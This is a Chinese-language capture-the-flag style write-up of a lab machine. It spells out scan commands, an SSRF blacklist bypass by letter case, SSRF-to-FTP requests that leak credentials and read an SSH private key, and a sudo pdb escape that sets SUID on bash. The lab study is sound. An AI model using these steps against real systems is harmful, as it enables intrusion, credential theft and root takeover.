目标是国外靶场
打过才知道 学的知识太少了师傅们看看就行 大家都会 要是描述得不对的地方 求指点
本地环境:kali
首先是通过ssrf拿下的靶机
第一台
因为是连了vpn的所以可以直接扫目标ip:10.10.11.111拿到目标 只有ip 那就先扫端口nmap -v -sSV -Pn 10.10.11.111 -T4 -sC
没啥信息 只有80端口 那就打开web看看直接访问10.10.11.111
直接访问不了 添加host头
echo “10.10.11.111 forge.xxx” >> /etc/hosts
然后在次访问
能访问了 发现有个上传的地方
上传试试
发现重命名的后缀名 不解析 上传应该是没办法了 找找其他突破先扫扫目录 和子域名目录:gobuster dir -u http://forge.xxx/ -w /usr/share/wordlists/dirb/common.txt
子域名:wfuzz -c -u “http://forge.xxx/“ -H “Host:FUZZ.forge.xxx” -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt
目录没扫出什么 扫到一个子域名 先进入看看还是不能直接访问 先加入到hostecho “10.10.11.111 admin.forge.xxx” >> /etc/hosts
提示只能本地访问
尝试加上X-Forwarded-For:127.0.0.1绕过失败。但是前面那个上传的地方 还有一个上传路径的地方
但是直接上传会提示是黑名单地址
既然是黑名单 我们尝试绕过
大小写绕过了:http://aDmin.forGe.xxx/然后访问页面发现报错
然后通过抓返回包发现一个路径
然后继续通过ssrf访问这个路径 继续进行抓包http://aDmin.forGe.xxx/announcements
然后访问路径抓取返回包 获得了ftp的密码
user:heightofsecurity123!以及获取/upload目录API用法,u=urlhttp://aDmin.forGe.xxx/upload?u=url
然后结合起来读取ftpftp://user:heightofsecurity123!@FORGE.xxx
http://aDmin.forGe.xxx/upload?u=ftp://user:heightofsecurity123!@FORGE.xxx
然后继续bp抓返回包
可以成功访问到,也就是说我们现在可以利用ssrf读取系统文件了。user.txt在这就说明现在已经是用户家目录了。读取ssh私钥http://aDmin.forGe.xxx/upload?u=ftp://user:heightofsecurity123!@FORGE.xxx/.ssh/id_rsa
用同样的方法读取
然后保存id_rsa
然后ssh连接ssh -i id_rsa user@10.10.11.111
成功连接上来
提权
sudo -l 发现一个不需要密码执行的py文件
然后看下这个文件
发现是建立socket链接 监听40433端口 那就先执行这个py文件看看先执行py文件看看 然后在用nc连接
然后在随便输入的时候 发现会调用pdb调试pdb模式下是可以执行python代码的。于是直接给bash加上suid提权
pdb:pdb是The Python Debugger的缩写,为Python标准库的一个模块。该模块规定了一个Python程序交互式源代码调试器,支持设置断点,也支持源码级单步调试,栈帧监视,源代码列出,任意栈帧上下文的随机Python代码估值。
到此 这一台也就提权完毕
